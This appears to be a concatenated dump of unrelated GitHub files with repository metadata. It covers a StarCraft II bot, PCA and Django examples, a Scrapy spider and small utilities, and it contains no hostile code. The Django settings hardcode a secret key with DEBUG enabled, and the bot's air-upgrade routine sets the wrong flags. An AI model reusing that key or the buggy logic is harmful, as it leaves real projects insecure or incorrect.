orders.append(unit.move(pos))
await self.do_actions(orders)
if enemys.exists:
forces = forces = self.units(VOIDRAY).ready.idle | self.units(CARRIER).ready.idle
for unit in forces:
enemys_in_range = enemys.in_attack_range_of(unit)
if enemys_in_range.exists:
self.do(unit.stop())
target = enemys_in_range.random
self.do(unit.attack(target))
# attack function
async def attack(self):
#target = self.find_target(self.state)
await self.zealot_attack()
await self.sentry_attack()
await self.stalker_attack()
await self.immortal_attack()
await self.voidray_attack()
await self.carrier_attack()
async def zealot_attack(self):
if len(self.known_enemy_units):
for zealot in self.units(ZEALOT):
if zealot.is_idle:
await self.do(zealot.attack(random.choice(self.known_enemy_units)))
async def sentry_attack(self):
if len(self.known_enemy_units) > 0:
for sentry in self.units(SENTRY):
abilites = await self.get_available_abilities(sentry)
if AbilityId.GUARDIANSHIELD_GUARDIANSHIELD in abilites:
await self.do(sentry(AbilityId.GUARDIANSHIELD_GUARDIANSHIELD))
await self.do(sentry.attack(random.choice(self.known_enemy_units)))
async def stalker_attack(self):
# if self.supply_used > 185:
# for stalker in self.units(STALKER).idle:
# await self.do(s.attack(self.find_target(self.state)))
if len(self.known_enemy_units) > 0:
for stalker in self.units(STALKER):
await self.do(stalker.attack(random.choice(self.known_enemy_units)))
async def immortal_attack(self):
if len(self.known_enemy_units) > 0:
for immortal in self.units(IMMORTAL):
await self.do(immortal.attack(random.choice(self.known_enemy_units)))
async def voidray_attack(self):
if len(self.known_enemy_units) > 0 and self.supply_used > 100:
fighting_units = self.known_enemy_units.not_structure
if len(fighting_units) < 2:
for voidray in self.units(VOIDRAY):
if voidray.is_idle:
await self.do(voidray.attack(random.choice(self.known_enemy_units)))
else:
for voidray in self.units(VOIDRAY):
if voidray.is_idle:
await self.do(voidray.attack(random.choice(fighting_units)))
# if len(self.known_enemy_units) < 1:
# for voidray in self.units(VOIDRAY):
# if voidray.is_idle and self.units(NEXUS). amount > 1:
# await self.do(voidray.move(self.units(NEXUS).random))
async def carrier_attack(self):
if len(self.known_enemy_units) > 0 and self.supply_used > 100:
fighting_units = self.known_enemy_units.not_structure
if len(fighting_units) < 2:
for carrier in self.units(CARRIER):
if carrier.is_idle:
await self.do(carrier.attack(random.choice(self.known_enemy_units)))
else:
for carrier in self.units(CARRIER):
if carrier.is_idle:
await self.do(carrier.attack(random.choice(fighting_units)))
# if len(self.known_enemy_units) < 1:
# for carrier in self.units(CARRIER):
# if carrier.is_idle and self.units(NEXUS).amount > 1:
# await self.do(carrier.move(self.units(NEXUS).random))
async def upgrade_air(self):
if self.units(CYBERNETICSCORE).ready.exists and self.supply_used > 30:
if self.can_afford(UpgradeId.PROTOSSAIRWEAPONSLEVEL1) and not self.air_weapon1_started:
ccore = self.units(CYBERNETICSCORE).ready.first
await self.do(ccore.research(UpgradeId.PROTOSSAIRWEAPONSLEVEL1))
self.air_weapon1_started = True
if self.can_afford(UpgradeId.PROTOSSAIRARMORSLEVEL1) and not self.air_armor1_started:
ccore = self.units(CYBERNETICSCORE).ready.first
await self.do(ccore.research(UpgradeId.PROTOSSAIRARMORSLEVEL1))
self.air_armor1_started = True
if self.air_armor1_started and self.air_weapon1_started:
if not self.units(FLEETBEACON).ready.exists and not self.already_pending(FLEETBEACON):
pylon = self.units(PYLON).ready.random
await self.build(FLEETBEACON, near=pylon)
if self.units(FLEETBEACON).ready.exists:
if self.supply_used > 100:
if self.can_afford(UpgradeId.PROTOSSAIRARMORSLEVEL2) and not self.air_armor2_started:
ccore = self.units(CYBERNETICSCORE).ready.first
await self.do(ccore.research(UpgradeId.PROTOSSAIRARMORSLEVEL2))
self.air_armor2_started = True
if self.supply_used > 100:
if self.can_afford(UpgradeId.PROTOSSAIRWEAPONSLEVEL2) and not self.air_weapon2_started:
ccore = self.units(CYBERNETICSCORE).ready.first
await self.do(ccore.research(UpgradeId.PROTOSSAIRWEAPONSLEVEL2))
self.air_armor2_started = True
if self.can_afford(UpgradeId.PROTOSSAIRARMORSLEVEL3) and not self.air_armor3_started:
ccore = self.units(CYBERNETICSCORE).ready.first
await self.do(ccore.research(UpgradeId.PROTOSSAIRARMORSLEVEL3))
self.air_armor2_started = True
if self.can_afford(UpgradeId.PROTOSSAIRWEAPONSLEVEL3) and not self.air_weapon3_started:
ccore = self.units(CYBERNETICSCORE).ready.first
await self.do(ccore.research(UpgradeId.PROTOSSAIRWEAPONSLEVEL3))
self.air_armor2_started = True
if __name__ == '__main__':
run_game(maps.get("PaladinoTerminalLE"), [
Bot(Race.Protoss, Sentinel()),
Computer(Race.Zerg, Difficulty.VeryHard),
#Computer(Race.Protoss, Difficulty.Harder),
#Computer(Race.Protoss, Difficulty.Harder),
#Bot(Race.Protoss, SentdeBot())
], realtime=True) | [
"noreply@github.com"
] | 0MNIP0TENT.noreply@github.com |
d03f122f98dbf6bba0498916c870e071bb955439 | c548c10c4fd0b6c1d1c10cc645cb3b90b31f2de6 | /ml/m29_pca2_3_wine.py | b21c357d299df1dafc9268bb91762f9f1bdd2093 | [] | no_license | sswwd95/Study | caf45bc3c8c4301260aaac6608042e53e60210b6 | 3c189090c76a68fb827cf8d6807ee1a5195d2b8b | refs/heads/master | 2023-06-02T21:44:00.518810 | 2021-06-26T03:01:26 | 2021-06-26T03:01:26 | 324,061,105 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,459 | py | import numpy as np
from sklearn.datasets import load_wine
from sklearn.decomposition import PCA
# deomposition 분해
datasets = load_wine()
x = datasets.data
y = datasets.target
print(x.shape, y.shape) #(178, 13) (178,)
'''
pca = PCA(n_components=10)
x2 = pca.fit_transform(x) # fit과 transform 합친 것
print(x2)
print(x2.shape) #(442, 7) 컬럼의 수가 재구성
pca_EVR = pca.explained_variance_ratio_ # 변화율
print(pca_EVR) #[0.40242142 0.14923182 0.12059623 0.09554764 0.06621856 0.06027192 0.05365605]
print(sum(pca_EVR))
# 7개 : 0.9479436357350414
# 8개 : 0.9913119559917797
# 9개 : 0.9991439470098977
# 10개 : 1.0
# 몇 개가 좋은지 어떻게 알까? 모델 돌려보면 알 수 있다. 통상적으로 95% 이면 모델에서 성능 비슷하게 나온다.
'''
pca = PCA()
pca.fit(x)
cumsum = np.cumsum(pca.explained_variance_ratio_)
# cunsum의 작은 것 부터 하나씩 더해준다. 함수는 주어진 축에서 배열 요소의 누적 합계를 계산하려는 경우에 사용된다.
print(cumsum)
# [0.99809123 0.99982715 0.99992211 0.99997232 0.99998469 0.99999315
# 0.99999596 0.99999748 0.99999861 0.99999933 0.99999971 0.99999992
# 1. ]
d = np.argmax(cumsum>=0.95)+1
print('cumsum >=0.95', cumsum >=0.95)
print('d : ', d)
# cumsum >=0.95 [ True True True True True True True True True True True True
# True]
# d : 1
import matplotlib.pyplot as plt
plt.plot(cumsum)
plt.grid()
plt.show()
| [
"sswwd95@gmail.com"
] | sswwd95@gmail.com |
bc4ce015eb040a0bfe60106b3a22e8e043989877 | ff182eeaf59b16f79b7d306eef72ddaadf0f4e71 | /Vaffle_interface/testcase/SystemModule/System_test23_invite_get_score.py | 877679a1cb1da86ccf973e312dd5811dcb3c9734 | [] | no_license | heyu1229/vaffle | 04d6f8b0d3bd0882ff1cdea54d18d5fdde7933b9 | 2c1c040f78094cf3cfc68f08627a958c4aa5e1d5 | refs/heads/master | 2023-06-05T09:55:21.894344 | 2021-03-12T07:26:45 | 2021-03-12T07:26:45 | 381,248,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 874 | py | # -*- coding:UTF-8 -*-
import unittest
import requests
import time,gc,sys
from Vaffle_interface.public_1.func_requests import FuncRequests
from Vaffle_interface.public_1.get_url import Url
class Invite_get_score(unittest.TestCase):
def setUp(self):
self.member_uuid = Url ().test_user ()
self.requests = FuncRequests ()
#-----------------邀请得积分--------------------------------
def testcase_001(self):
sheet_index = 3
row = 34
print("testcase_001 反馈:")
date=time.strftime("%Y-%m-%d %H:%M:%S",time.localtime())
payload = {'member_uuid':self.member_uuid}
result=self.requests.interface_requests_payload(self.member_uuid, sheet_index, row, payload)
self.assertEqual(10000, result["code"])
print("code返回值:10000")
if __name__=="__main__":
unittest.main() | [
"1004856404@qq.com"
] | 1004856404@qq.com |
0f2a3975e869ed37fbb6cd1203f10a05e51e08ff | 5276bf1bca8c3e2328b4661f8e71454f1e491ce9 | /khalifasite/asgi.py | 17f68c452b38d9b40f78cb1892823c82e9d6c65e | [] | no_license | kidaqrus/khalifa-site | e51c1a58b8dc5196e725192278e5fe4b37146369 | 2aa52aeeef2a50a8e04956b15120a037d9475c2c | refs/heads/master | 2021-01-13T22:23:23.228518 | 2020-02-28T10:34:16 | 2020-02-28T10:34:16 | 242,513,856 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | """
ASGI config for khalifasite project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'khalifasite.settings')
application = get_asgi_application()
| [
"adikwusule@gmail.com"
] | adikwusule@gmail.com |
3658d5cfa571df350142c76baf20af84922d923e | 79eea732277857d59616a029dfc8d1e8ab721249 | /day8/exercise2.py | 15c56c81ae2014a7e5ab56010d89829c80bc62de | [] | no_license | myorg2020/python-tutorial | 0cd0757a861263a45e3d9a235b3f869ffbcad618 | 65870da260850517009e145c9fc8077fdc2de380 | refs/heads/master | 2022-11-28T02:28:57.020480 | 2020-08-09T18:06:28 | 2020-08-09T18:06:28 | 262,838,511 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | # We have to print a dictionary in below format by taking user input:
# users = {
# 'name' : 'Amitesh',
# 'age' : 24,
# 'fav_movies' : ['coco', 'avengers'],
# 'fav_songs' : ['song1', 'song2'],
# }
users = {}
name = input('Enter the name: ')
age = input('Enter the age: ')
fav_movies = input('Enter your fav movies separated by comma: ').split(',')
fav_songs = input('Enter your fav songs separated by comma: ').split(',')
print('\n')
users['name'] = name
users['age'] = age
users['fav_movies'] = fav_movies
users['fav_songs'] = fav_songs
for key, value in users.items():
print(f'{key} : {value}') | [
"amitesh1258@gmail.com"
] | amitesh1258@gmail.com |
3496f4f700e2b659641fffae4def352bfb335f83 | 6310a9bec472ff653d29dee3fa3d98bba1d57290 | /movies/models.py | 40f5dea696678775fca8bb7c40a25c79356e9779 | [] | no_license | TS2021AlenaM/DS | 9628c8d38062906ebfc1503948df45cbd56a9775 | bdef0bcfb0e41671f8db30a1589907b5add32e7f | refs/heads/main | 2023-06-18T18:54:09.954206 | 2021-07-17T16:56:17 | 2021-07-17T16:56:17 | 386,990,802 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,361 | py | from datetime import date
from django.db import models
# Create your models here.
from django.urls import reverse
class Category(models.Model):
"""Категории"""
name = models.CharField("Категория", max_length=150)
description = models.TextField("Описание", blank=True)
url = models.SlugField(max_length=160)
def __str__(self):
return self.name
class Meta:
verbose_name = "Категория"
verbose_name_plural = "Категории"
class Actor(models.Model):
"""Актеры и режиссеры"""
name = models.CharField("Имя", max_length=150)
age = models.PositiveSmallIntegerField("Возраст", default=0)
description = models.TextField("Описание", blank=True)
image = models.ImageField("Изображение", upload_to="actors/")
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse("actor_detail", kwargs={"slug": self.name})
class Meta:
verbose_name = "Актеры и режиссеры"
verbose_name_plural = "Актеры и режиссеры"
class Genre(models.Model):
"""Жанры"""
name = models.CharField("Имя", max_length=150)
description = models.TextField("Описание", blank=True)
url = models.SlugField(max_length=160, unique=True)
def __str__(self):
return self.name
class Meta:
verbose_name = "Жанр"
verbose_name_plural = "Жанры"
class Movie(models.Model):
"""Фильм"""
title = models.CharField("Название", max_length=160)
tagline = models.CharField("Слоган", max_length=100, default='')
description = models.TextField("Описание")
poster = models.ImageField("Постер", upload_to='movies/')
year = models.PositiveSmallIntegerField("Дата выхода", default=2020)
country = models.CharField("Страна", max_length=30)
directors = models.ManyToManyField(Actor, verbose_name="Режиссер", related_name='film_director')
actors = models.ManyToManyField(Actor, verbose_name="Актеры", related_name='film_actor')
genres = models.ManyToManyField(Genre, verbose_name="Жанры")
world_premiere = models.DateField("Премьера в мире", default=date.today)
budget = models.PositiveIntegerField("Бюджет", default=0, help_text="Укажите сумму в долларах")
fees_in_usa = models.PositiveIntegerField("Сборы в США", default=0, help_text="Укажите сумму в долларах")
fees_in_world = models.PositiveIntegerField("Сборы в мире", default=0, help_text="Укажите сумму в долларах")
category = models.ForeignKey(Category, verbose_name="Категория", on_delete=models.SET_NULL, null=True)
url = models.SlugField(max_length=130, unique=True)
draft = models.BooleanField("Черновик", default=False)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse("movie_detail", kwargs={"slug": self.url})
def get_review(self):
return self.reviews_set.filter(parent__isnull=True)
def get_rating(self):
return self.rating_set.get()
class Meta:
verbose_name = "Фильм"
verbose_name_plural = "Фильмы"
class MovieShots(models.Model):
"""Кадры из фильмов"""
title = models.CharField("Заголовок", max_length=160)
description = models.TextField("Описание", blank=True)
image = models.ImageField("Изображение", upload_to='movie_shots/')
movie = models.ForeignKey(Movie, on_delete=models.CASCADE, verbose_name="Фильм")
def __str__(self):
return self.title
class Meta:
verbose_name = "Кадр из фильмов"
verbose_name_plural = "Кадры из фильмов"
class RatingStar(models.Model):
"""Звезда рейтинга"""
value = models.IntegerField("Значение", default=0)
def __str__(self):
return str(self.value)
class Meta:
verbose_name = "Звезда рейтинга"
verbose_name_plural = "Звезды рейтинга"
ordering = ['-value']
class Rating(models.Model):
"""Рейтинг"""
ip = models.CharField("IP адрес", max_length=15)
star = models.ForeignKey(RatingStar, on_delete=models.CASCADE, verbose_name="Звезда")
movie = models.ForeignKey(Movie, on_delete=models.CASCADE, verbose_name="Фильм")
def __str__(self):
return f"{self.star}"
class Meta:
verbose_name = "Рейтинг"
verbose_name_plural = "Рейтинги"
class Reviews(models.Model):
"""Отзывы"""
email = models.EmailField()
name = models.CharField("Имя", max_length=100)
text = models.TextField("Сообщение", max_length=5000)
parent = models.ForeignKey('self', verbose_name="Родитель", on_delete=models.SET_NULL, blank=True, null=True)
movie = models.ForeignKey(Movie, verbose_name="Фильм", on_delete=models.CASCADE)
def __str__(self):
return f"{self.name} - {self.movie}"
class Meta:
verbose_name = "Отзыв"
verbose_name_plural = "Отзывы"
| [
"87577721+TS2021AlenaM@users.noreply.github.com"
] | 87577721+TS2021AlenaM@users.noreply.github.com |
3bc1379fb8d510e8890c97960043bbd3b4d5b2a4 | 041469cfe025d838bba0a40ca172d2874605d618 | /Python/environments/djangoshell/djangoshell/wsgi.py | 890c0f454fb3de6adf0c679652390b193ef1e013 | [] | no_license | anarslez/repo1 | 06816547b21504e46fa0840e9c898c3470195321 | 625befde39851d9a3bb9dfd09067f344ce68665e | refs/heads/master | 2020-03-24T19:23:52.235714 | 2018-09-11T03:59:14 | 2018-09-11T03:59:14 | 142,923,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 400 | py | """
WSGI config for djangoshell project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangoshell.settings")
application = get_wsgi_application()
| [
"anarslez@gmail.com"
] | anarslez@gmail.com |
cb96246148423573cb1403ea0aee9d38f67aad27 | b179e3b3fbcb971dfe9b3597098bea9c0ad1a516 | /Q3.py | 7cc36ec99e05c2bbb9229be82b2af40cc8f753e4 | [] | no_license | kautukraj/Lab2Py | f69a7143969ca2107cc869d20539620a1d38c90c | 5468306ebfc191ea784d50d20ad00cc46365c902 | refs/heads/master | 2020-07-13T04:25:00.694835 | 2019-08-31T05:50:11 | 2019-08-31T05:50:11 | 204,988,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 354 | py | from Q3input import *
#Your code - begin
r1 = len(m1)
c1 = len(m1[0])
r2 = len(m2)
c2 = len(m2[0])
if c1 != r2:
print ("Multiplication not possible")
output = [[0 for row in range(c2)]for col in range(r1)]
for i in range(r1):
for j in range(c2):
for k in range(c1):
output[i][j] += m1[i][k] * m2[k][j]
# Your code - end
print(output)
| [
"noreply@github.com"
] | kautukraj.noreply@github.com |
43efea586f69c18e0575129229adb4937f8816da | 215010786cd047d51f05538e3b7e1e00adcf40f5 | /GUI/lists.py | d8790dacf79d010ad4901ee03d200bfc8a82259d | [] | no_license | elugo13/Full_Stack_Programming_for_Complete_Beginners_in_Python | cc13d6aee7aefa78a3f06cedd56f7e4c066031a7 | 9dd706af89c5cfd71346f0f077af242dee229a9d | refs/heads/main | 2023-08-31T07:40:29.366909 | 2021-10-06T15:34:14 | 2021-10-06T15:34:14 | 412,499,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 756 | py | from PyQt5 import QtWidgets
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
class MainWindow(QMainWindow):
def __init__(self, *args, **kwargs):
super(MainWindow, self).__init__(*args, **kwargs)
self.setWindowTitle("Lists")
self.resize(1280, 720)
layout = QVBoxLayout()
mylist= QListWidget()
mylist.addItems(['Easy', 'Hard', 'Expert'])
mylist.currentItemChanged.connect(self.show_selected)
layout.addWidget(mylist)
widget = QWidget()
widget.setLayout(layout)
self.setCentralWidget(widget)
def show_selected(self, item):
print(item.text())
app = QApplication([])
window = MainWindow()
window.show()
app.exec() | [
"lugoerik00@gmail.com"
] | lugoerik00@gmail.com |
5f1f4ad717ccde42c1a45dcfb353c5a9f6f7a916 | 3f763cf893b09a3be562858613c928703ff349e4 | /client/verta/verta/_swagger/_public/modeldb/model/ModeldbCreateProjectResponse.py | b749fb1cab032e8cfae28f8b96a3aba11500069f | [
"Apache-2.0"
] | permissive | VertaAI/modeldb | 636e46fc025b01a514d599b10e228c8735503357 | ec9ac7712500adb13fd815dfd476ce9f536c6921 | refs/heads/main | 2023-08-31T00:45:37.220628 | 2023-08-30T18:45:13 | 2023-08-30T18:45:13 | 71,305,435 | 844 | 142 | Apache-2.0 | 2023-09-14T19:24:13 | 2016-10-19T01:07:26 | Java | UTF-8 | Python | false | false | 616 | py | # THIS FILE IS AUTO-GENERATED. DO NOT EDIT
from verta._swagger.base_type import BaseType
class ModeldbCreateProjectResponse(BaseType):
def __init__(self, project=None):
required = {
"project": False,
}
self.project = project
for k, v in required.items():
if self[k] is None and v:
raise ValueError('attribute {} is required'.format(k))
@staticmethod
def from_json(d):
from .ModeldbProject import ModeldbProject
tmp = d.get('project', None)
if tmp is not None:
d['project'] = ModeldbProject.from_json(tmp)
return ModeldbCreateProjectResponse(**d)
| [
"noreply@github.com"
] | VertaAI.noreply@github.com |
d5b0a2847556b1852431142f68ab4ded685876ad | e091ca4b7c5ff05ef10f09ae0379587b0c20bf11 | /project/settings.py | 4a7e207856287089a74b996a9b3634ecd6761d5f | [] | no_license | sai-k-kiran/Attendance-management-system | f8ad8e467c9988f310c2778146ca7beec5b9953d | 0bb059b2acb62342d8bd704a294040d5ad609d70 | refs/heads/master | 2023-06-30T12:52:02.179519 | 2021-07-27T12:30:27 | 2021-07-27T12:30:27 | 389,892,078 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,468 | py | """
Django settings for project project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-e0vgk_%#rrm(ibr24naa_*v2wup@f@^f794u7_i68#95cef32i'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'new.apps.NewConfig',
]
AUTH_USER_MODEL = 'new.Teacher'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
]
STATIC_ROOT = os.path.join(BASE_DIR, 'assets')
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"sai.kiran.7698@gmail.com"
] | sai.kiran.7698@gmail.com |
f026f41d97ad800e361e469b6d9b2f9ce747b465 | 325bee18d3a8b5de183118d02c480e562f6acba8 | /pycan/pycan/spiders/listed_issuers_spider.py | 5cbf6d2e6c7d9efd5de970ad5a60ec512b0647b2 | [] | no_license | waynecanfly/spiderItem | fc07af6921493fcfc21437c464c6433d247abad3 | 1960efaad0d995e83e8cf85e58e1db029e49fa56 | refs/heads/master | 2022-11-14T16:35:42.855901 | 2019-10-25T03:43:57 | 2019-10-25T03:43:57 | 193,424,274 | 4 | 0 | null | 2022-11-04T19:16:15 | 2019-06-24T03:00:51 | Python | UTF-8 | Python | false | false | 7,315 | py | """从归档(MiG Archives)文件中提取公司列表"""
from io import BytesIO
from zipfile import BadZipFile
import scrapy
import pymysql
from scrapy import signals
from openpyxl import load_workbook
from dateutil.parser import parse as parse_datetime
from scrapy.spidermiddlewares.httperror import HttpError
from twisted.internet.error import DNSLookupError
from twisted.internet.error import TimeoutError, TCPTimedOutError
from twisted.internet.error import ConnectionRefusedError
from twisted.web._newclient import ResponseNeverReceived
from ..items import CompanyItem, ProfileDetailItem
class ListedIssuersSpider(scrapy.Spider):
name = 'listed_issuers'
start_urls = [
'https://www.tsx.com/listings/current-market-statistics/mig-archives'
]
captions = [
{
'Exchange': 'exchange_market_code',
'Name': 'name_en',
'Root Ticker': 'security_code',
'SP_Type': 'security_type',
'Sector': 'sector_code',
'Date of TSX Listing YYYYMMDD': 'ipo_date',
'Place of Incorporation C=Canada U=USA F=Foreign': (
'country_code_origin'
)
},
{
'Exchange': 'exchange_market_code',
'Name': 'name_en',
'Root Ticker': 'security_code',
'Sector': 'sector_code',
'Date of Listing': 'ipo_date'
}
]
countries = {
'C': 'CAN',
'U': 'USA',
'F': None
}
@classmethod
def from_crawler(cls, crawler, *args, **kwargs):
spider = super(ListedIssuersSpider, cls).from_crawler(
crawler, *args, **kwargs
)
crawler.signals.connect(spider.spider_opened, signals.spider_opened)
crawler.signals.connect(spider.spider_closed, signals.spider_closed)
return spider
def spider_opened(self, spider):
self.logger.info('Opening spider %s...', spider.name)
conn = pymysql.connect(**self.settings['DBARGS'])
with conn.cursor() as cursor:
cursor.execute("""\
select code, security_code, exchange_market_code, status from \
company where country_code_listed='CAN'\
""")
records = cursor.fetchall()
conn.close()
self.companies = {}
for it in records:
id_ = it['exchange_market_code'], it['security_code']
self.companies[id_] = it['code'], it['status']
if records:
NUMBER = slice(3, None) # 公司code数字编号区
self.max_code_num = int(max(it['code'] for it in records)[NUMBER])
else:
self.max_code_num = 10000
self.total_new = 0
def spider_closed(self, spider):
self.logger.info(
'Closing spider %s..., %d new', spider.name, self.total_new
)
def parse(self, response):
try:
doc_href = response.xpath(
"//a[text()='TSX/TSXV Listed Issuers']/..//a/@href"
).extract()[1]
yield response.follow(
doc_href,
callback=self.parse_listed_issuers,
errback=self.errback_scraping
)
except IndexError:
self.logger.error("Can't find listed issuers info")
def parse_listed_issuers(self, response):
try:
wb = load_workbook(BytesIO(response.body), read_only=True)
labels_row, start_row = 7, 8
for ws in wb.worksheets:
labels = [
cell.value.replace('\n', ' ') for cell in ws[labels_row]
if isinstance(cell.value, str)
]
names = [
it.replace(' ', '_').lower() + '_mig_can' for it in labels]
for each in self.captions:
if set(each.keys()).issubset(set(labels)):
indexes = {
labels.index(it): each[it] for it in each
}
for row in ws.iter_rows(min_row=start_row):
item = CompanyItem()
profiles = []
for index, cell in enumerate(row):
if cell.value:
try:
item[indexes[index]] = cell.value
except KeyError:
profiles.append(
ProfileDetailItem(
name=names[index],
display_label=labels[index],
value=cell.value,
data_type='string'
)
)
try:
item['country_code_origin'] = self.countries[
item['country_code_origin']
]
except KeyError:
pass
company = (
item['exchange_market_code'],
item['security_code']
)
if company not in self.companies:
self.max_code_num += 1
item['code'] = 'CAN' + str(self.max_code_num)
item['name_origin'] = item['name_en']
if 'ipo_date' in item:
item['ipo_date'] = parse_datetime(
str(item['ipo_date']))
self.companies[company] = (item['code'], None)
for p_item in profiles:
p_item['company_code'] = item['code']
yield p_item
yield item
break
else:
self.logger.error(
'Failed finding captions for listed issuers')
except BadZipFile:
self.logger.error(
'Listed issuers may redirect to %s', response.url)
def errback_scraping(self, failure):
req_url = failure.request.url
if failure.check(HttpError):
response = failure.value.response
self.logger.error('HttpError %s on %s', response.status, req_url)
elif failure.check(DNSLookupError):
self.logger.error('DNSLookupError on %s', req_url)
elif failure.check(ConnectionRefusedError):
self.logger.error('ConnectionRefusedError on %s', req_url)
elif failure.check(TimeoutError, TCPTimedOutError):
self.logger.error('TimeoutError on %s', req_url)
elif failure.check(ResponseNeverReceived):
self.logger.error('ResponseNeverReceived on %s', req_url)
else:
self.logger.error('UnpectedError on %s', req_url)
self.logger.error(repr(failure))
| [
"1370153124@qq.com"
] | 1370153124@qq.com |
42428250f3f843297cf0dea506a3f02218b3db63 | fb00808d44e18c7b27a8f86b553c586d4033504f | /sandbox/factory/factory_metrics.py | abb3cb2f34553b13d0e0d4696ef04c0988509187 | [] | no_license | akamlani/datascience | 4f1bab94a1af79b7f41339b5a1ba4acc965d4511 | 62f4d71f3642f89b4bbd55d7ef270321b983243e | refs/heads/master | 2021-01-17T10:11:11.069207 | 2016-12-29T04:33:49 | 2016-12-29T04:33:49 | 24,774,956 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 15,565 | py | from __future__ import division
import pandas as pd
import numpy as np
import argparse
import os
import re
import json
import sys
import warnings
from datetime import datetime
import matplotlib.pyplot as plt
import seaborn as sns
warnings.filterwarnings("ignore")
### Create Tabular Structure
def get_folder_attrs(path):
root_dir = os.listdir(path)
root_attr = {name: os.path.isdir(path + name) for name in root_dir}
root_dirs = map(lambda (k,v): k,filter(lambda (k,v): v==1, root_attr.iteritems()) )
root_files = map(lambda (k,v): k,filter(lambda (k,v): v==0, root_attr.iteritems()) )
n_rootdirs = len(root_dirs)
n_rootfiles = len(root_files)
return {
'root_dirs': root_dirs,
'num_rootdirs': n_rootdirs,
'root_files': root_files,
'num_rootfiles': n_rootfiles
}
def extract_subfolder_data(subfolder, rootpath):
root_data_dict = {}
for (dirpath, dirnames, filenames) in os.walk(rootpath+subfolder):
if len(filenames) > 1:
k = dirpath.split(rootpath)[1].strip('data/')
v = list( set([filename.split('.')[0] for filename in filenames]) )
root_data_dict[k] = v
return root_data_dict
def create_units(status_dict, root_path):
# create a series of records of units that were tested
df_units = pd.DataFrame()
for k,v in status_dict.iteritems():
for item in v:
unit_type, date_rec = [s.strip() for s in k.split("/")]
file_name = "_".join(item.split("_")[:-2])
ts_rec = "".join(item.split("_")[-2:])
is_dir = os.path.isdir(root_path + k + item)
if not is_dir:
ts_rec = datetime.strptime(ts_rec, '%Y%m%d%H%M%S')
filename = root_path + k +'/' + item + '.csv'
# create new format to tabulate structure
unit_name = file_name.split("_")[0].strip() if unit_type == 'FAIL' else file_name
unit_dict = {'file_name':file_name, 'unit_name': unit_name,
'unit_status': unit_type, 'date_record': ts_rec}
df_units = df_units.append(unit_dict, ignore_index=True)
df_units['date'] = df_units.date_record.dt.date
df_units['hour'] = df_units.date_record.dt.hour
return df_units
def create_dir_structure():
if not os.path.exists(data_path):
print("No Data Present")
sys.exit()
else:
if not os.path.exists(log_path): os.makedirs(log_path)
if not os.path.exists(image_path): os.makedirs(image_path)
